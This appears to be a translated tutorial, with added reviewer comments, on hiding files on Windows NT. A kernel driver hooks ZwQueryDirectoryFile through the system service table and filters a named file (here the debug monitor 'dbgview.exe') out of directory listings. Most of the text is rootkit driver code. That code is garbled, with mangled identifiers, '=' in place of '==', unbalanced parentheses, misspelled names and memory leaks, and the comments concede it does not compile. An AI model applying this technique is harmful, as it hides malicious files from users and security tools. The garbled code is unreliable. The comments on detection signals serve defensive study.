At present there are many ways to hide files and directories on NT. The simplest is to set the system and hidden attributes on the files and folders so that the shell does not display them; however, this method is neither thorough nor practical. Next we introduce how to use an NT driver program to intercept a native NT API and hide files and directories completely. NT ships a file, NTDLL.dll, in which most of the native APIs are wrapped. The ZwQueryDirectoryFile API is the one used to enumerate files and directories, so intercepting this single API is enough to hide files and directories completely. Now carry out the following steps (preparation: find a WDM driver sample in the DDK, that is, the simplest possible driver):
1. Define the structure for FILE_INFORMATION_CLASS value 3, _FILE_BOTH_DIR_INFORMATION, which is a required parameter of ZwQueryDirectoryFile.
// FILE_BOTH_DIR_INFORMATION as the article defines it: one record per directory
// entry, chained through nextentryoffset (0 marks the last record) and ending in a
// variable-length name. The hook in step 6 walks this chain.
Typedef struct _ file_both_dir_information {
Ulong nextentryoffset;   // byte distance from this record to the next one; 0 on the last record
Ulong fileindex;
Large_integer creationtime;
Large_integer lastaccesstime;
Large_integer lastwritetime;
Large_integer changetime;
Large_integer endoffile;
Large_integer allocationsize;
Ulong fileattributes;
Ulong filenamelength;    // length of filename in bytes; the name is not NUL-terminated by the format
Ulong easize;
Cchar shortnamelength;
Wchar shortname [12];
Wchar filename [1];      // trailing variable-length name ([1] is the pre-C99 flexible-array idiom)
} File_both_dir_information, * pfile_both_dir_information;
2. Declare ZwQueryDirectoryFile, then define a function-pointer type with the same prototype:
// Declaration of the native directory-enumeration service the article targets. The
// driver later resolves this symbol to a system service table slot via systemservice().
Extern ntsysapi ntstatus ntapi zwquerydirectoryfile (
In handle hfile,                              // handle of the directory being enumerated
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,              // receives the chain of records
In ulong fileinformationbufferlength,         // size of that buffer in bytes
In file_information_class fileinfoclass,      // selects the record layout placed in the buffer
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery );
// Function-pointer type with the same prototype, used to keep and call the original
// service once its table entry has been replaced.
Typedef ntstatus (* realzwquerydirectoryfile) (IN handle hfile,
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,
In ulong fileinformationbufferlength,
In file_information_class fileinfoclass,
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery );
// Variable intended to hold the original service address.
// NOTE(review): as transcribed this line has no type, and its name does not match
// realzwquerydirectoryfile, which is what the DriverEntry snippet assigns and the hook calls.
Realzwquerysysteminformation;
3. Declare the replacement (hook) function with the same prototype:
// Prototype of the replacement routine. It must keep the original's exact signature,
// because it is entered directly from the system service table in place of the original.
Ntstatus hookzwquerydirectoryfile (
In handle hfile,
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,
In ulong fileinformationbufferlength,
In file_information_class fileinfoclass,
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery );
4. Add the following statements to the DriverEntry function:
// Save the address currently held in the service table slot for zwquerydirectoryfile, so
// the original service can still be called from the hook and restored on unload.
Realzwquerydirectoryfile = (realzwquerydirectoryfile) (systemservice (zwquerydirectoryfile ));
// Overwrite that slot with the replacement. Writing to the system service table is exactly
// what SSDT-integrity checks and, on 64-bit Windows, Kernel Patch Protection (PatchGuard)
// flag; a table entry that points outside the kernel image is the classic indicator.
// NOTE(review): as transcribed the parentheses on this line are unbalanced.
(Realzwquerydirectoryfile) (systemservice (zwquerydirectoryfile) = hookzwquerydirectoryfile;
5. Add the restoring code to the DriverUnload function:
// Put the saved original address back into the service table on unload. Without this, the
// slot would still point into the unloaded driver's image and the next directory query
// would fault in kernel mode.
(Realzwquerydirectoryfile) (systemservice (zwquerydirectoryfile) = realzwquerydirectoryfile;
6. The preparation is now complete: the function pointers have been saved and swapped. What remains is to implement the replacement function HookZwQueryDirectoryFile. The code is as follows:
// Replacement for zwquerydirectoryfile. It forwards the call to the saved original and
// then, for FileBothDirectoryInformation queries only, walks the returned record chain
// and removes every record whose name starts with hidedirfile, so the caller never
// sees that entry.
//
// Review notes (defender's view):
//  - This listing is a lossy transcription: identifier casing is mangled, the `==`
//    comparisons appear as `=`, and `/n` in the format strings stands for `\n`. It does
//    not compile as shown.
//  - The filter covers one information class and one service. A query with another
//    class, or any enumeration that bypasses this service (for example reading the
//    volume's on-disk structures), still returns the entry; that discrepancy is what
//    cross-view detection relies on.
//  - Every record name is emitted with DbgPrint, so a kernel debugger or a DebugView-style
//    log shows the hook operating and the exact name it filters.
//  - Stability hazards: two ANSI strings are allocated on every loop pass but freed only
//    once after the loop, and filenamelength is never consulted, so the name conversion
//    relies on a terminator the record format does not guarantee. Hooks like this tend
//    to leak and crash, which is itself a detection signal.
Ntstatus hookzwquerydirectoryfile (
In handle hfile,
In handle hevent optional,
In pio_apc_routine ioapcroutine optional,
In pvoid ioapccontext optional,
Out pio_status_block piostatusblock,
Out pvoid fileinformationbuffer,
In ulong fileinformationbufferlength,
In file_information_class fileinfoclass,
In Boolean breturnonlyoneentry,
In punicode_string pathmask optional,
In Boolean brestartquery)
{
Ntstatus RC;
Ulong cr0value;
Ansi_string ansifilename, ansidirname, hidedirfile;
Unicode_string unifilename;
// Name of the entry to hide. The literal below is what is actually compared (upper-cased
// names are matched against it, so its spelling and case matter).
Rtlinitansistring (& hidedirfile, "dbgview. EXE ");
// Let the real zwquerydirectoryfile fill the caller's buffer first.
Rc = (realzwquerydirectoryfile ))(
Hfile,
Hevent,
Ioapcroutine,
Ioapccontext,
Piostatusblock,
Fileinformationbuffer,
Fileinformationbufferlength,
Fileinfoclass,
Breturnonlyoneentry,
Pathmask,
Brestartquery );
/* Only on success, and only when the buffer holds FILE_BOTH_DIR_INFORMATION records
   (the layout defined in step 1), is the result post-processed. */
If (nt_success (RC) & (fileinfoclass = filebothdirectoryinformation ))
{
Pfile_both_dir_information pfileinfo;      // record currently being examined
Pfile_both_dir_information plastfileinfo;  // record before it, needed to unlink the last one
Bool blastone;
// Start at the first record in the caller's buffer.
Pfileinfo = (pfile_both_dir_information) fileinformationbuffer;
Plastfileinfo = NULL;
// Walk the chain until the record whose nextentryoffset is 0.
Do
{
Blastone =! (Pfileinfo-> nextentryoffset );   // true on the last record
// NOTE(review): 'uniilename' here does not match 'unifilename' declared above.
Rtlinitunicodestring (& uniilename, pfileinfo-> filename );
// Two ANSI copies (both allocate) so one can receive the upper-cased form.
Rtlunicodestringtoansistring (& ansifilename, & unifilename, true );
Rtlunicodestringtoansistring (& ansidirname, & unifilename, true );
Rtlupperstring (& ansifilename, & ansidirname );
// Debug output: every enumerated name and the pattern go to the kernel debugger stream.
Dbuplint ("ansifilename: % s/n", ansifilename. buffer );
Dbuplint ("hidedirfile: % s/n", hidedirfile. buffer );
// Compare only the first hidedirfile.length bytes: any name beginning with the pattern
// counts as a match and is removed.
If (rtlcomparememory (ansifilename. buffer, hidedirfile. buffer, hidedirfile. Length) = hidedirfile. length)
{
Dbuplint ("this is hidedirfile! /N ");
If (blastone)
{
// Matching record is the last one in the buffer.
If (pfileinfo = (pfile_both_dir_information) fileinformationbuffer)
{
// It is also the only record: report that the listing is empty.
Rc = 0x80000006; // STATUS_NO_MORE_FILES
}
Else
{
// Otherwise unlink it by terminating the chain at the previous record.
Plastfileinfo-> nextentryoffset = 0;
}
Break;
}
Else // not the last record: overwrite it with everything that follows
{
// Byte offset of this record within the buffer, and the number of bytes after the
// record that follows it (32-bit arithmetic on pointer values).
Int IPOs = (ulong) pfileinfo)-(ulong) fileinformationbuffer;
Int ileft = (DWORD) fileinformationbufferlength-IPOs-pfileinfo-> nextentryoffset;
Rtlcopymemory (pvoid) pfileinfo, (pvoid) (char *) pfileinfo + pfileinfo-> nextentryoffset), (DWORD) ileft );
// pfileinfo is deliberately not advanced: the shifted-in record is examined next.
Continue;
}
}
// No match: remember this record and step to the next one.
Plastfileinfo = pfileinfo;
Pfileinfo = (pfile_both_dir_information) (char *) pfileinfo + pfileinfo-> nextentryoffset );
} While (! Blastone );
// Frees only the strings from the final pass; earlier passes' allocations are lost.
Rtlfreeansistring (& ansidirname );
Rtlfreeansistring (& ansifilename );
}
Return (RC );
}